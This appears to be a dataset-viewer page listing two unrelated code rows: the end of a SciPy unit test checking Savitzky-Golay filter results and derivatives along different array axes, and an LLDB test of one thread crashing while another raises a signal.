dz = np.array([dx1.T, dx2.T, dx3.T])
y = savgol_filter(z, 7, 3, axis=1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (21, 3, 2)
z = z.swapaxes(0, 1).copy()
dz = dz.swapaxes(0, 1).copy()
y = savgol_filter(z, 7, 3, axis=0, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=0, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
|
import unittest2
from lldbsuite.test.decorators import *
from lldbsuite.test.concurrent_base import ConcurrentEventsBase
from lldbsuite.test.lldbtest import TestBase
@skipIfWindows
class ConcurrentCrashWithSignal(ConcurrentEventsBase):
mydir = ConcurrentEventsBase.compute_mydir(__file__)
# Atomic sequences are not supported yet for MIPS in LLDB.
@skipIf(triple='^mips')
def test(self):
""" Test a thread that crashes while another thread generates a signal."""
self.build(dictionary=self.getBuildFlags())
self.do_thread_actions(num_crash_threads=1, num_signal_threads=1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.